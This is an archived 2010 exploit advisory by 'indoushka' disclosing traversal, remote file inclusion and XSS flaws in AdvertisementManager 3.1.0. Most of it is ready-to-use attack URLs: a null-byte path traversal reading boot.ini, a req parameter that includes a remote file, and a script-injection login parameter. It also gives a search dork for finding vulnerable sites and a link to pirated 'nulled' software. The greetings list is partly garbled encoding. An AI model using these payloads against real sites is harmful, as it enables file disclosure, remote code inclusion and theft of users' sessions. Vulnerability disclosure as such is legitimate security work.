Advertisement Manager 3.1.0 XSS / RFI / Traversal

2010-01-20T00:00:00
ID PACKETSTORM:85390
Type packetstorm
Reporter indoushka
Modified 2010-01-20T00:00:00

Description

                    
                      `========================================================================================  
| # Title : AdvertisementManager v3.1.0 Multti Vulnerability  
| # Author : indoushka  
| # email : indoushka@hotmail.com  
| # Home : www.iq-ty.com/vb  
| # Script Home : http://www.ziddu.com/download/7950525/advertisement-manager-v3.1.0-php-nulled.rar.html  
| # Dork : AdvertisementManager v3.1.0 (Copyright © 2000-2004 AdvertisementManager.com. All rights reserved. )  
| # Tested on : windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)  
| # Bug : Mullti  
====================== Exploit By indoushka ================================= 
# Exploit :  
 
1- Directory traversal (Windows) 
 
http://127.0.0.1/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=../../../../../../../../boot.ini%00 
 
2- File inclusion 
 
http://127.0.0.1/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=http://127.0.0.1/c.txt? 
 
3- XSS 
 
http://127.0.0.1/Advertisement/cgi/index.php?usr=%00'"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&passw=indoushka&savelogin=off&admin=Cancel&req=admin_login 
 
================================ Dz-Ghost Team ======================================================== 
Greetz : ÔßÑÇ áÓßÇä æáÇíÉ ÓíÏí ÈáÚÈÇÓ 22 + äÇÓ ãÚÓßÑ + äÇÓ ÊíÇÑÊ + äÇÓ ÇáÌáÝÉ + äÇÓ ÇáãÓíáÉ 
+ äÇÓ ÊáãÓÇä + äÇÓ äÏÑæãÉ +äÇÓ ãÛäíÉ + äÇÓ æÌÏÉ +äÇÓ ÃÛÇÏíÑ + äÇÓ ÝÇÓ æãßäÇÓ + äÇÓ æåÑÇä 
Exploit-db Team (loneferret+Exploits+dookie2000ca) 
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org 
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org 
www.forums.ibb7.com * www.owned-m.com *Stake (v4-team.com) * www.dev-chat.com * Cyb3r IntRue (avengers team)  
* www.securityreason.com * www.packetstormsecurity.org * www.best-sec.net * www.zone-h.net * www.m-y.cc  
* www.hacker.ps * no-exploit.com * www.bug-blog.de * www.bawassil.com * www.host4ll.com * www.xp10.me  
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com) * www.kadmiwe.net 
SoldierOfAllah (www.m4r0c-s3curity.cc) * www.arhack.net * www.google.com * www.sec-eviles.com  
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.arabic-m.com * www.securitywall.org  
r1z (www.sec-r1z.com) * www.zac003.persiangig.ir * www.0xblackhat.ir * www.mormoroth.net  
------------------------------------------------------------------------------------------------------------ 
`